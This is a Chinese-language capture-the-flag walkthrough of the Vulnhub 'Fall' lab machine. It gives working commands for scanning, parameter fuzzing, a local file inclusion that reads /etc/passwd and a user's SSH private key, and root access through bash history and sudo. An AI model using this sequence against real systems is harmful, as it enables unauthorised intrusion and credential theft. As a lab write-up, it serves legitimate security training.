Vulnhub實戰-FULL靶機??
下載地址:http://www.vulnhub.com/entry/digitalworldlocal-fall,726/
1.描述
通過描述我們可以知道這個靶機列舉比較多,
2.主機探測,埠掃描
- 主機探測
可以看到掃出主機IP為:192.168.33.60
nmap -sn 192.168.33.0/24
- 接下來進行埠掃描,服務發現
nmaps -sS -p- -v 192.168.33.60
我們可以看到開啟了22,80,139,443,445,3306,9090埠,這里埠一大部分都是障眼法噢,比如那個3306,不管了80埠開了,肯定有web服務了,先去看看再說,
3.web服務測驗
- 訪問IP打開看到一個頁面,然后找找看看發現了這樣一個頁面:
這句話說讓我們不要再用test腳本去污染webroot了??,我沒干,那既然有人干了,我們就去看看test.php在不在吧,訪問http://192.168.33.60/test.php,得到如下提示:
提示:說我們的http引數錯誤
還記得一開始說的這個靶機列舉比較多嘛,這里我們爆破以下http引數吧,通過wfuzz(kali自帶的)
不懂命令的可以看看這個教程:https://www.cnblogs.com/Xy--1/p/12913514.html
wfuzz -c -w /root/dictionary/fuzzDicts-master/paramDict/AllParam.txt --hh 80 --hc 404,403 -u "http://192.168.33.60/test.php?FUZZ=/etc/passwd" -t 60
可以看到我們成功爆出引數file了,通過file去訪問一下看看:
http://192.168.33.60/test.php?file=/etc/passwd
我們看到了用戶名qiu,然后這里接著就是通過ssh密鑰登錄ssh了,
ssh密鑰登錄的相關知識可以參考如下文章:https://wangdoc.com/ssh/key.html
我們這里通過file存在檔案包含漏洞了,接下來我們看看默認的存在密鑰的地方有沒有私鑰吧,
ssh密鑰默認存放目錄:
/home/用戶名/.ssh/id_rsa //rsa加密的私鑰
/home/用戶名/.ssh/id_rsa.pub //rsa加密的公鑰
/home/用戶名/.ssh/id_dsa //dsa加密的私鑰
/home/用戶名/.ssh/id_rsa.pub //dsa加密的公鑰
一般ssh加密演算法就是rsa和dsa加密,以上都是ssh密鑰的默認檔案名和默認存放目錄
接下來我們嘗試讀取以下發現了rsa加密的私鑰:
我們把私鑰檔案下載到kali上面然后通過私鑰登錄ssh,通過私鑰登錄是不需要密碼的,(當然你也可以設定要密碼,默認不需要??)
wget http://192.168.33.60/test.php?file=/home/qiu/.ssh/id_rsa -O id_rsa
ssh [email protected] -i id_rsa
4.提權
成功登錄ssh之后,我們發現當前用戶是qiu,接下來我們想辦法提權到root用戶,
- 我們首先看看歷史命令執行了什么,通過查看歷史命令我們發現了當前用戶的密碼,然后我們看看能夠以root權限執行什么命令,我們發現用戶可以通過sudo執行所以命令,那么我們就能夠通過qiu的密碼去登錄到root用戶了,執行
sudo su命令成功切換到root用戶,
ls -al
cat .bash_history
sudo -l
sudo su
接下來讀取proof.txt,先給它777權限在讀取,得到flag!??
個人總結:通過這篇文章我明白了ssh登錄可以通過密鑰登錄,比密碼登錄更加安全,因為密碼登錄,弱密碼存在被爆破的可能性,密碼太難了又記不住,學到了!??
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/332006.html
標籤:其他